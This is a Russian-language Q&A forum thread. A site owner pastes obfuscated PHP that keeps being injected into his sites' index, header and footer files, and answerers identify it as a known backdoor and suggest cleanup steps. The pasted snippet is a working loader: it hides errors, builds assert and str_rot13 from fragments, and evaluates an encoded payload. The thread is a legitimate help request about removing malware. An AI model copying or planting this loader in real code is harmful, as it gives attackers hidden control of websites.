В файлах на сайте регулярно появляется какой-то код?

Question

[Денис Клепко]

Здравствуйте!
На одном хостинге несколько сайтов. В файлах index, header и footer постоянно появляется вот такой код:

<?php 
//###==###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTIlpz9lK3WypT9lqTyhMluSK0SZGPx7DTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvk0paIyXGgNMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFNzWvOyoKO0rFtxnJW2XFxtrlNxnJW2VQ0tWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqBlNtMJAbolNxnJW2B30tMJkmMJyzVPuyoKO0rFtxnJW2XFxtrjccMvNbp3Elp3ElXPEsH0IFIxIFJlWVISEDK0uCH1DvKFjtVwRlAl4jVvxcrlEhLJ1yVQ0tWS9GEIWJEIWoVyASHyMSHy9OEREFVy07sJIfp2I7WT5uoJHtCFNxK1ASHyMSHyfvFSEHHS9VG1AHVy07sDbxqKWfVQ0tVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqXF4vWzD9Vv51pzkyozAiMTHbWT5uoJHhWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVznG0kWzt9Vv5gMQHbVwAxZzSvLzL0BQOxZQSvLmL4LmV5AmWwZ2SuLwWxLmywZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7qJ5mMKDbWTyvqvx7sDcwqKWfK2Afo3AyXPEwnPx7Pa0tMJkmMJyzXTyhnI9aMKDbVzSfoT93K3IloS9zo3OyovVcVQ09VQRcVUfXWTyvqvN9VTMcoTIsM2I0K2AioaEyoaEmXPE1pzjcBjc9PzyzXPSyoKO0rFtxK1OCH1EoVaNvKFxtWvLtoJD1XT1xAFtxK1OCH1EoVaNvKFxcVQ09VPV2ATIxZ2IzAJWyLGN5LJEyBGuzLGDkMwqwZQSvMTR0MFVcVUftDTI2LJjbp3ElnKOmoTSmnTImXPEsHR9GISfvLlWqXFx7VU0XMJAbolNxnJW2Bjc9VU0="));'); $strings($light);
//###==###
?>

У файлов убирал права на запись. Код все равно появился, а права у файлов стали 777.
Хостинг ничего сказать не может. Известно, что изменения вносятся не через ftp.
Через ssh я находил все файлы в которых был добавлен код. Везде удалял. Но через какое-то время он снова появляется.
Что с этим сделать и что делает этот код?

Answer 1

[Ernest Faizullin]

Это бакдор php.backdoor.str_rot13.001

Как бороться https://habrahabr.ru/post/188878/

Вот тут еще есть возможное решение Как расшифровать зловреда?

Comments

[Денис Клепко]

Благодарю)

Answer 2

[Антон]

Скорее всего шелл какой-то. Вероятно, у вас в каких-то файлах уязвимость. Если при добавлении кода меняется дата файла - то смотрите в access log'ах к какому файлы в это время было обращение - оттуда и начинайте разбираться.

Answer 3

[Leonid Fedotov]

Скорее всего зловред - ищите уязвимости в исполняемых файлах, затем смените FTP-авторизационные данные, как вариант может быть дырка у хостера.